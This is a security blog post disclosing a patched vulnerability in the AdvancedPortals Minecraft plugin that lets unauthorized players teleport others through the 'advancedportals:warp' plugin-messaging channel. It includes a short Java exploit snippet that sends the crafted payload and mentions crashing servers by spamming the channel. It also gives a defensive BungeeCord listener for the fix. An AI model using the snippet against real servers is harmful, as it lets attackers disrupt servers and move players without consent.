roote.rs

advancedportals: teleport vulnerability

plugin messaging abuse again leads to a vulnerability in AdvancedPortals, a really popular minecraft plugin.

overview

the popular minecraft plugin advancedportals had a vulnerability allowing unauthorized players to teleport specific players, or everyone on a server, to “portal destinations” at will.

this allows users to crash servers (via spamming incorrect data to the channel), or make them borderline unplayable.

this does not affect 1.12 or below, but if your server is still on that old of a version, you should probably update anyway.

additionally, even with the plugin installed on BungeeCord (not Velocity, only BungeeCord), a mistake in the code allowed the plugin messages to go through to the backend, although the BungeeCord plugin is supposed to prevent exactly this.

patch

there were 2 commits to patch this: one patches the spigot version to require an explicit configuration file setting instead of checking whether the server is behind a proxy and enabling the channel automatically, and one patches the bungeecord version to fix a programming error where the handler returned before setCancelled was called on the event.

the patched version is available on spigotmc here.

technical details

this vulnerability allowed an attacker to use the plugin messaging channel advancedportals:warp with the following data:

- "BungeePortal" (command name)
- destination name
- player uuid

the destination name can be obtained by tab completing /advancedportals desti:, so there is no need to guess it.

it is quite simple when put together:

ByteArrayDataOutput in = ByteStreams.newDataOutput();
in.writeUTF("BungeePortal");
in.writeUTF(portal);
in.writeUTF(uuid.toString());
// AdvancedPortalsCustomPayload is a custom payload type with advancedportals:warp as the channel
NetworkUtil.trySend(new ServerboundCustomPayloadPacket(new AdvancedPortalsCustomPayload(in.toByteArray())));
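
the proxy-side fix described in the patch section comes down to cancelling the event before any early return. the listener below is an added example of that ordering against the BungeeCord API, not the advancedportals source: the class name WarpChannelGuard, the log wording and the commented-out "buggy" lines are assumptions for illustration.

```java
import java.io.ByteArrayInputStream;
import java.io.DataInputStream;
import java.io.IOException;
import java.util.logging.Logger;
import net.md_5.bungee.api.connection.ProxiedPlayer;
import net.md_5.bungee.api.event.PluginMessageEvent;
import net.md_5.bungee.api.plugin.Listener;
import net.md_5.bungee.event.EventHandler;
import net.md_5.bungee.event.EventPriority;

// added example: hypothetical guard listener, not the advancedportals source
public final class WarpChannelGuard implements Listener {
    private static final String WARP_CHANNEL = "advancedportals:warp"; // channel named in the post
    private final Logger log;

    public WarpChannelGuard(Logger log) {
        this.log = log;
    }

    // ordering bug of the kind the post describes (illustrative only):
    //   if (event.getSender() instanceof ProxiedPlayer) return; // leaves here...
    //   event.setCancelled(true);                               // ...so this never runs
    @EventHandler(priority = EventPriority.LOWEST)
    public void onPluginMessage(PluginMessageEvent event) {
        if (!WARP_CHANNEL.equalsIgnoreCase(event.getTag())) return;
        if (!(event.getSender() instanceof ProxiedPlayer)) return; // backend -> proxy traffic is untouched

        // cancel before anything that can return or throw, so the message never reaches the backend
        event.setCancelled(true);

        ProxiedPlayer player = (ProxiedPlayer) event.getSender();
        log.warning("dropped client-sent " + WARP_CHANNEL + " message from "
                + player.getName() + " (" + player.getUniqueId() + "): " + describe(event.getData()));
    }

    // best-effort decode of the first two UTF fields for the log line; malformed data must not throw
    private static String describe(byte[] data) {
        try (DataInputStream in = new DataInputStream(new ByteArrayInputStream(data))) {
            return "command=" + in.readUTF() + " destination=" + in.readUTF();
        } catch (IOException e) {
            return "undecodable payload, " + data.length + " bytes";
        }
    }
}
```

register it from a BungeeCord plugin's onEnable with getProxy().getPluginManager().registerListener(this, new WarpChannelGuard(getLogger())). the decoded fields are attacker-controlled, so treat them as untrusted if the log is parsed downstream.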